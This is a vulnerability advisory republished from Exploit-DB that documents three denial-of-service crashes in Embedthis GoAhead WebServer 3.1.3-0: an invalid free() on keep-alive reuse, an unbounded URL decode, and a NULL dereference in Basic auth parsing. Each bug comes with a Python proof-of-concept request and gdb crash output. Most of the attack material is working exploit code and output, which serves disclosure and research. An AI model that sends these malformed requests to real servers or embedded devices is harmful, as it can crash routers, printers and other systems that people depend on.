Embedthis Goahead WebServer 3.1.3-0 – Multiple Vulnerabilities

  • 作者: Maksymilian Motyl
    日期: 2014-02-19
  • 来源:https://www.exploit-db.com/exploits/31761/
  • # Title: Embedthis Goahead Webserver multiple DoS vulnerabilities.
    # Author: 0in (Maksymilian Motyl)
    # Date: 18.02.2014
    # Version: 3.1.3-0
    # Software Link: http://embedthis.com/products/goahead/
    # Download: https://github.com/embedthis/goahead
    # Tested on: Linux x86, 32-bit (the register dumps below are i386: eax/esi/edi, not the x32 ABI)
    # Description: 
    # "GoAhead is embedded in hundreds of millions of devices and applications like: printers, routers, switches, IP phones, mobile applications, data acquisition, 
    # military applications and WIFI gateways."
    # .... Ok.
    # However, I have not tested any of the products listed at http://embedthis.com/products/goahead/users.html, so I cannot confirm whether they are affected.
    
    -----------------------------------------------
    	1st vulnerability - invalid free() in termWebs() on keep-alive connection reuse (glibc's munmap_chunk() pointer check aborts the process; the backtrace below shows the path reuseConn() -> termWebs() -> free). Only the DoS outcome was demonstrated; exploitability beyond the abort was not assessed.
    
    ***************************************
    
    #!/usr/bin/python
    # PoC 1: a keep-alive request whose query string is a run of 1024 '#'
    # characters followed by ".cgi/c.txt". Only the request bytes are built
    # here; the code that actually sends them is not part of this listing.
    # Note that the string deliberately ends after "Connection: keep-alive"
    # with no trailing CRLF -- the sending harness is presumably responsible
    # for terminating the header block.
    _REQUEST_LINE = "GET /cgi-bin/test/a/c/?" + "#" * 1024 + ".cgi/c.txt HTTP/1.1"
    _HEADERS = [
        "Host: 127.0.0.1",
        "User-Agent: BillyExploiter",
        "Accept: text/html",
        "Accept-Language: pl",
        "Accept-Encoding: gzip, deflate",
        "Connection: keep-alive",
    ]
    # Request line and headers joined by CRLF; no terminator after the last header.
    packet = "\r\n".join([_REQUEST_LINE] + _HEADERS)
    
    ***************************************
    
    Program received signal SIGABRT, Aborted.
    0xb7772424 in __kernel_vsyscall ()
    (gdb) bt
    #0  0xb7772424 in __kernel_vsyscall ()
    #1  0xb757d941 in *__GI_raise (sig=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
    #2  0xb7580d72 in *__GI_abort () at abort.c:92
    #3  0xb75b9e15 in __libc_message (do_abort=2, 
    fmt=0xb7691e70 "*** glibc detected *** %s: %s: 0x%s ***\n")
    at ../sysdeps/unix/sysv/linux/libc_fatal.c:189
    #4  0xb75c3f01 in malloc_printerr (action=<optimized out>, 
    str=0x6 <Address 0x6 out of bounds>, ptr=0xb7765dad) at malloc.c:6283
    #5  0xb75c517e in munmap_chunk (p=<optimized out>) at malloc.c:3540
    #6  0xb7752d74 in termWebs (wp=wp@entry=0x8573240, reuse=reuse@entry=1)
    at src/http.c:457
    #7  0xb775309c in reuseConn (wp=0x8573240) at src/http.c:520
    #8  complete (wp=wp@entry=0x8573240, reuse=reuse@entry=1) at src/http.c:575
    #9  0xb7754571 in websPump (wp=wp@entry=0x8573240) at src/http.c:837
    #10 0xb7755606 in readEvent (wp=0x8573240) at src/http.c:797
    #11 socketEvent (wptr=0x8573240, mask=2, sid=<optimized out>) at src/http.c:735
    
    
    *** glibc detected *** goahead: munmap_chunk(): invalid pointer: 0xb7765dad ***
    
    (gdb) x/xw 0xb7765dad
    0xb7765dad:	0x74746800   # little-endian, i.e. bytes 00 68 74 74 = "\0htt": the pointer passed to free() lands in the middle of what looks like a string constant (e.g. "...http..."), not at the start of a malloc'd chunk, which is why glibc rejects it
    
    -----------------------------------------------
    
    	2nd vulnerability - unbounded in-place URL decode in websDecodeUrl() called from websUrlParse() with len=-1 (no limit). The faulting store (`mov %dl,(%esi)`) targets 0xb7756253, an address in the same 0xb77xxxxx range as the library code (compare eip), consistent with a write to a read-only string literal rather than a writable buffer.
    
    ***************************************
    
    #!/usr/bin/python
    # PoC 2: a request line whose target is a bare scheme ("http://") or a
    # host with an empty port ("http://dupa:"). No headers are needed. Both
    # variants are listed; the second assignment is the one left in `packet`.
    _REQUEST_FMT = "GET %s HTTP/1.1\r\n"
    packet = _REQUEST_FMT % "http://"

    # Same crash happens when:
    packet = _REQUEST_FMT % "http://dupa:"
    
    ***************************************
    
    
    Program received signal SIGSEGV, Segmentation fault.
    websDecodeUrl (decoded=decoded@entry=0xb7756253 "/", 
    input=input@entry=0xb7756253 "/", len=<optimized out>, len@entry=-1)
    at src/http.c:2225
    warning: Source file is more recent than executable.   (gdb caveat: the src/http.c line numbers in this trace may not match the binary exactly, since the source was modified after the build)
    2225	*op = *ip;
    (gdb) bt
    #0  websDecodeUrl (decoded=decoded@entry=0xb7756253 "/", 
    input=input@entry=0xb7756253 "/", len=<optimized out>, len@entry=-1)
    at src/http.c:2225
    #1  0xb774248f in websUrlParse (url=0x83bf140 "http", url@entry=0x83cd58c "http://", 
    pbuf=pbuf@entry=0xbfe6ce14, pprotocol=pprotocol@entry=0x0, 
    phost=phost@entry=0xbfe6ce00, pport=pport@entry=0xbfe6ce0c, 
    ppath=ppath@entry=0xbfe6ce08, pext=pext@entry=0xbfe6ce10, 
    preference=preference@entry=0x0, pquery=pquery@entry=0xbfe6ce04)
    at src/http.c:3122
    #2  0xb7745079 in parseFirstLine (wp=0x83bf240) at src/http.c:949
    #3  parseIncoming (wp=0x83bf240) at src/http.c:870
    
    (gdb) disas $eip
    
     0xb773fb28 <+72>:	cmp    $0x25,%dl
     0xb773fb2b <+75>:	je     0xb773fb70 <websDecodeUrl+144>
    => 0xb773fb2d <+77>:	mov    %dl,(%esi)
    
    (gdb) info reg
    eax            0x1	1
    ecx            0x13	19
    edx            0x2f	47
    ebx            0xb775e91c	-1217009380
    esp            0xbfe6cd20	0xbfe6cd20
    ebp            0xb7756254	0xb7756254
    esi            0xb7756253	-1217043885
    edi            0xb7756253	-1217043885
    eip            0xb773fb2d	0xb773fb2d <websDecodeUrl+77>
    
    (gdb) x/xw 0xb7756253
    0xb7756253:	0x7473002f   # little-endian bytes 2f 00 73 74 = "/\0st": a one-character "/" string immediately followed by another string, as expected for adjacent literals
    
    
    -----------------------------------------------
    
    	3rd vulnerability - NULL pointer dereference in parseBasicDetails(): strchr() is called with a NULL haystack (eax = edi = 0 at the faulting `mov (%eax),%ecx`; edx holds 0x3a3a3a3a, the ':' separator being searched for, replicated by glibc's strchr). The credential "#" is not valid base64, so the decoded credential pointer is presumably NULL and is passed on unchecked.
    
    ***************************************
    
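    #!/usr/bin/python
    # PoC 3: request to the basic-auth protected path carrying an Authorization
    # header whose credential ("#") is not valid base64.
    #
    # FIX: the original listing was missing the line-continuation backslash
    # after the "Connection: keep-alive\r\n" line, so the following
    # "Authorization: Basic #\r\n" was a stand-alone expression statement and
    # never became part of `packet` -- the request as written would have been
    # sent WITHOUT the malformed header and would not reach the crash in
    # parseBasicDetails(). Parenthesised implicit concatenation avoids the
    # fragile trailing-backslash style altogether.
    #
    # As in the other PoCs, the header block is not terminated with an empty
    # line here; the (unshown) sending harness presumably adds it.
    packet = (
        "GET http://127.0.0.1/auth/basic/ HTTP/1.1\r\n"
        "Host: 127.0.0.1\r\n"
        "Accept: text/html\r\n"
        "Accept-Language: pl\r\n"
        "Accept-Encoding: gzip, deflate\r\n"
        "Connection: keep-alive\r\n"
        "Authorization: Basic #\r\n"
    )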
    ***************************************
    
    (gdb) bt
    #0  strchr () at ../sysdeps/i386/strchr.S:127
    #1  0xb770652a in parseBasicDetails (wp=0x8055240) at src/auth.c:717
    #2  0xb7706c31 in websAuthenticate (wp=wp@entry=0x8055240) at src/auth.c:110
    #3  0xb7717532 in websRouteRequest (wp=wp@entry=0x8055240) at src/route.c:85
    
    (gdb) disas $eip
     0xb758799a <+90>:	lea    0x0(%esi),%esi
     0xb75879a0 <+96>:	add    $0x10,%eax
    => 0xb75879a3 <+99>:	mov    (%eax),%ecx
    
    (gdb) info reg
    eax            0x0	0
    ecx            0x3a3a	14906
    edx            0x3a3a3a3a	976894522
    ebx            0xb772a91c	-1217222372
    esp            0xbfc71428	0xbfc71428
    ebp            0x8055240	0x8055240
    esi            0x8055240	134566464
    edi            0x0	0
    eip            0xb75879a3	0xb75879a3 <strchr+99>